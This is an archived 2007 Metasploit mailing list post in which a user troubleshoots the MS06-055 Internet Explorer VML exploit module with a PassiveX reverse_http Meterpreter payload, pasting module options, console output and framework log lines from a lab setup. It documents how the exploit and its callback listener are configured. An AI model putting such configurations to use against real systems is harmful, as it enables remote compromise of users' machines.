Metasploit mailing list archives
PassiveX-based payloads and MS06-055
From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Tue, 13 Mar 2007 18:53:17 +0100
Il giorno Tue, 13 Mar 2007 09:42:32 -0700 mmiller at hick.org ha scritto:
A few quick things to check: 1) What version of IE is installed on the machine? I'm assuming IE 6, but just need to be sure.
You're right... IE 6.
2) What happens when you manually bring up the PX site after the values have been successfully altered? In the previous example, you could try browsing to: http://192.168.33.130:10000//OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s There might be some additional information you can collect by doing 'setg LogLevel 3' and then taking a look at ~/.msf3/logs/framework.log.
Following what you suggested me... msf exploit(ms06_055_vml_method) > show options Module options: Name Current Setting Required Description ------------------- -------- ----------- SRVHOST 192.168.33.130 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. URIPATH up no The URI to use for this exploit (default is random) Payload options: Name Current Setting Required Description ------------------- -------- ----------- DLL /home/buffer/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload EXITFUNC seh yes Exit technique: seh, thread, process PXAXCLSID B3AC7307-FEAE-4e43-B2D6-161E68ABA838 yes ActiveX CLSID PXAXDLL /home/buffer/msf3/data/passivex/passivex.dll yes ActiveX DLL to inject PXAXVER -1,-1,-1,-1 yes ActiveX DLL Version PXHOST 192.168.33.130 yes The local HTTP listener hostname PXPORT 8080 yes The local HTTP listener port PXURI /px no The URI root for requests Exploit target: Id Name -- ---- 0 Windows NT 4.0 -> Windows 2003 SP1 msf exploit(ms06_055_vml_method) > exploit [*] PassiveX listener started. [*] Using URL: http://192.168.33.130:8080/up [*] Server started. [*] Exploit running as background job. msf exploit(ms06_055_vml_method) > [*] Sending PassiveX main page to client [*] Sending PassiveX main page to client The second "Sending..." message was displayed when I tried to directly browsing http://192.168.33.130:8080/px but it seems nothing still happens at all. Looking at this behavior it seems to me the first stage gets executed and that the browser asks for the PXHOST even in the first case but after this step nothing else. These are the most significant lines in framework.log [03/13/2007 18:20:29] [d(2)] core: windows/meterpreter/reverse_http: Successfully encoded with encoder x86/shikata_ga_nai (size is 479) [03/13/2007 18:20:29] [d(2)] core: PassiveX listener started on http://192.168.33.130:8080/px [03/13/2007 18:20:41] [e(0)] rex: Failed to find handler for resource: / [03/13/2007 18:20:47] [d(2)] core: windows/meterpreter/reverse_http: Successfully encoded with encoder x86/shikata_ga_nai (size is 479) [03/13/2007 18:21:15] [e(0)] rex: Failed to find handler for resource: / After looking at this last log message I even tried setting PXURI to / and to an empty string but no results at all even in this case. Regards, -- Angelo Dell'Aera 'buffer' Antifork Research, Inc. http://buffer.antifork.org Metro Olografix PGP information in e-mail header -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070313/cb22a4be/attachment.pgp>
Current thread:
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 14)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 14)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 16)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)